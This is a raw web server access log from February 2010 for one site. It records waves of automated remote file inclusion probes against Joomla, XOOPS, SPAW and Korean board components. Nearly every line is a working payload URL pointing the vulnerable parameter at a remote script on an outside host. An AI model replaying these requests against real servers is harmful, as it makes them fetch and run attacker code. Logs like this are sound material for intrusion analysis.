213.239.230.130 - - [12/Feb/2010:06:15:52 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:16:04 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:06:17:21 -0800] "GET /logs/access_100121.log%20%20/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:06:17:22 -0800] "GET /index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:06:17:22 -0800] "GET /write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:06:17:23 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:06:17:23 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:06:17:27 -0800] "GET /logs/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:06:17:50 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:06:17:50 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:06:17:50 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:17:52 -0800] "GET /components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:17:52 -0800] "GET /logs/access_100103.log%20%20//components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:17:52 -0800] "GET /logs//components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:06:17:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:06:17:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:06:17:53 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:06:18:03 -0800] "GET /logs/access_100111.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:06:18:04 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:06:18:04 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:06:18:04 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:06:18:15 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:06:18:16 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:06:18:16 -0800] "GET /write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:18:27 -0800] "GET /logs/access_100104.log%20%20//components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:18:38 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:06:18:38 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:06:18:38 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:06:18:38 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:18:40 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:19:11 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:19:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:19:11 -0800] "GET /logs/access_100119.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:19:16 -0800] "GET /logs/access_100201.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:06:19:36 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:06:19:36 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:06:19:38 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [12/Feb/2010:06:19:41 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [12/Feb/2010:06:19:41 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [12/Feb/2010:06:19:41 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [12/Feb/2010:06:19:44 -0800] "GET /logs/access_100104.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [12/Feb/2010:06:20:05 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [12/Feb/2010:06:20:05 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [12/Feb/2010:06:20:05 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:20:18 -0800] "GET /components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:20:18 -0800] "GET /logs/access_100103.log//components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:20:26 -0800] "GET /logs//components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:20:52 -0800] "GET /components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:20:53 -0800] "GET /logs//components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:20:53 -0800] "GET /logs/access_100103.log//components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
216.36.59.85 - - [12/Feb/2010:06:20:56 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [12/Feb/2010:06:20:56 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [12/Feb/2010:06:20:56 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:21:19 -0800] "GET /logs/access_100118.log%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:21:19 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:21:19 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
38.101.148.126 - - [12/Feb/2010:06:21:31 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [12/Feb/2010:06:21:32 -0800] "GET /orange_g/forum/viewtopic.php?p=27079 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
216.36.59.85 - - [12/Feb/2010:06:21:34 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:22:07 -0800] "GET /logs/access_100104.log//components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
79.99.44.89 - - [12/Feb/2010:06:22:40 -0800] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:22:46 -0800] "GET /logs/access_100128.log%20%20//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:06:22:48 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:06:22:48 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:06:22:48 -0800] "GET /logs/access_100118.log%20%20//errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:22:49 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:22:49 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:22:58 -0800] "GET /logs/access_100104.log//components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:23:08 -0800] "GET /logs/access_100103.log%20%20//components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:23:08 -0800] "GET /components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:23:08 -0800] "GET /logs//components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [12/Feb/2010:06:23:12 -0800] "GET /logs/access_100125.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:23:33 -0800] "GET /logs/access.log%20%20//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:23:41 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:23:42 -0800] "GET /logs/access_100112.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [12/Feb/2010:06:23:45 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [12/Feb/2010:06:23:45 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [12/Feb/2010:06:23:45 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:23:46 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.70.72.86 - - [12/Feb/2010:06:24:21 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.72.86 - - [12/Feb/2010:06:24:21 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.72.86 - - [12/Feb/2010:06:24:21 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [12/Feb/2010:06:24:24 -0800] "GET /logs/access_100125.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [12/Feb/2010:06:24:25 -0800] "GET /logs/access_100104.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:06:24:44 -0800] "GET /logs/access_100123.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:24:57 -0800] "GET /logs/access_100112.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:24:57 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:24:57 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.244.120.61 - - [12/Feb/2010:06:25:02 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://www.wannasurf.com/store/idx? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
95.244.120.61 - - [12/Feb/2010:06:25:03 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.wannasurf.com/store/idx? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
95.244.120.61 - - [12/Feb/2010:06:25:03 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://www.wannasurf.com/store/idx? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:06:25:22 -0800] "GET /logs/access_100203.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:06:26:13 -0800] "GET /logs/access_100104.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:06:26:14 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:06:26:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:06:26:30 -0800] "GET /logs/access_100107.log%20%20/?errors=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:26:39 -0800] "GET /logs//components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:26:39 -0800] "GET /logs/access_100103.log%20%20//components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:26:40 -0800] "GET //xoops_lib/modules/protector/oninstall.php?=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:26:40 -0800] "GET /logs///xoops_lib/modules/protector/oninstall.php?=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:26:43 -0800] "GET /logs/access_100114.log%20%20///xoops_lib/modules/protector/oninstall.php?=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:26:54 -0800] "GET /logs/access_100129.log%20%20///xoops_lib/modules/protector/oninstall.php?=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:27:12 -0800] "GET //xoops_lib/modules/protector/oninstall.php?=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:27:17 -0800] "GET /logs/access_100114.log%20%20///xoops_lib/modules/protector/oninstall.php?=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:27:17 -0800] "GET /logs///xoops_lib/modules/protector/oninstall.php?=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:27:18 -0800] "GET /logs/access_100104.log%20%20//components/errors.php?error=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [12/Feb/2010:06:27:26 -0800] "GET /logs/access_100107.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:27:30 -0800] "GET /logs/access_100129.log%20%20///xoops_lib/modules/protector/oninstall.php?=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:06:27:48 -0800] "GET /logs/access_100203.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:06:27:52 -0800] "GET /logs/access_100126.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:06:27:52 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:06:27:52 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:06:27:54 -0800] "GET /logs/access_100123.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:27:55 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:27:55 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:27:55 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:06:27:57 -0800] "GET /logs/access_100208.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
